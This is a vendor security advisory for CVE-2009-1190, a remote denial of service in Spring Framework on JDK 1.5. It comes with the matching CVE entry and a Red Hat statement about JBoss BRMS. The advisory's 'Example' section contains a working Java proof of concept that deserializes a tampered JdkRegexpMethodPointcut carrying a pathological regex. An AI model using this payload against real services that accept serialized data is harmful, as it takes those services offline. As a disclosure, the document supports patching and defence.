CVE-2009-1190: Spring Framework Remote Denial of Service vulnerability Severity: Low Vendor: SpringSource Versions Affected: Spring Framework 1.1.0-2.5.6, 3.0.0.M1-3.0.0.M2 dm Server 1.0.0-1.0.2 (note 2.x not affected since dm Server 2.x requires a 1.6 JDK) Description: The j.u.r.Pattern.compile method in Sun 1.5 JDK has a problem ([1],[2]) with exponential compilation times, when using optional groups. A workaround [3] was implemented in 1.4.2_06 but the root cause of poor performance in regex processing was not resolved until JDK 1.6. JdkRegexpMethodPointcut calls Pattern.compile(source[i]); via it's inherited readObject method (from AbstractRegexpMethodPointcut). When Sun JVM 1.5 driven application with spring.jar in its classpath accepts serializable data, an attacker could use a long regex string with many optional groups to consume enormous CPU resources. And, with a few requests all listeners will be occupied with compiling regex expressions forever. Mitigation: - Users of all products may upgrade to JRE/JDK 1.6 which includes the fix for the root cause - Spring Framework 2.5.6.SEC01 has been released for Community users that includes a workaround to the root cause - Spring Framework 2.5.6.SR2 is available for Enterprise users that includes a workaround to the root cause - Disable functionality that accepts serializable data from untrusted sources - dm Server 1.0.3 that includes a workaround to the root cause will be released shortly - Instrumented Spring Framework 2.5.6.SR2 that includes a workaround to the root cause will be released shortly Example: public class DoSSpring { static byte[] getSerialized(Object o) throws Exception { ByteArrayOutputStream baos = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(baos); oos.writeObject(o); oos.flush(); oos.close(); return baos.toByteArray(); } public static void main(String[] a) throws Exception{ String thePattern="(Y)?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)" + "?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)?(K)" + "?(W)?(I)?(U)?(a)?$"; String longerPattern = thePattern.substring(0,thePattern.length()-1)+thePattern; int length = longerPattern.length(); String fakePattern = longerPattern.replaceAll(".", "A"); JdkRegexpMethodPointcut jrmp = new JdkRegexpMethodPointcut(); jrmp.setPattern(fakePattern); System.out.println(jrmp); byte[] theArray = getSerialized(jrmp); int i = 0; for (; i< theArray.length;i++) { if (((char)theArray[i])=='A' &&((char)theArray[i+1]=='A')) { break; } } System.arraycopy(longerPattern.getBytes(), 0, theArray, i, length); ByteArrayInputStream bis = new ByteArrayInputStream(theArray); ObjectInputStream ois = new ObjectInputStream(bis); Object o = ois.readObject(); // returns after a very very long time } } Credit: This issue was discovered by the RedHat Security Response Team References: [1] http://www.packetstormsecurity.org/hitb06/DAY_1_-_Marc_Schoenefeld_-_Pentesting_Java_J2EE.pdf [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2540 [3] http://archive.cert.uni-stuttgart.de/uniras/2005/01/msg00035.html
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-1190 to the following vulnerability: Name: CVE-2009-1190 URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1190 Assigned: 20090331 Reference: BUGTRAQ:20090424 CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability Reference: URL: http://www.securityfocus.com/archive/1/archive/1/502926/100/0/threaded Reference: MISC: http://www.packetstormsecurity.org/hitb06/DAY_1_-_Marc_Schoenefeld_-_Pentesting_Java_J2EE.pdf Reference: CONFIRM: http://www.springsource.com/securityadvisory Reference: CONFIRM: https://bugzilla.redhat.com/show_bug.cgi?id=497161 Reference: SECUNIA:34892 Reference: URL: http://secunia.com/advisories/34892 Reference: XF:springframework-data-dos(50083) Reference: URL: http://xforce.iss.net/xforce/xfdb/50083 Algorithmic complexity vulnerability in the java.util.regex.Pattern.compile method in Sun Java Development Kit (JDK) before 1.6, when used with spring.jar in SpringSource Spring Framework 1.1.0 through 2.5.6 and 3.0.0.M1 through 3.0.0.M2 and dm Server 1.0.0 through 1.0.2, allows remote attackers to cause a denial of service (CPU consumption) via serializable data with a long regex string containing multiple optional groups, a related issue to CVE-2004-2540.
Statement: This flaw affected JBoss Enterprise BRMS Platform 5.1.0 when run on Sun JDK 1.5.x. It was resolved in JBoss Enterprise BRMS Platform 5.2.0, both by updating spring and by dropping support for Sun JDK 1.5.x.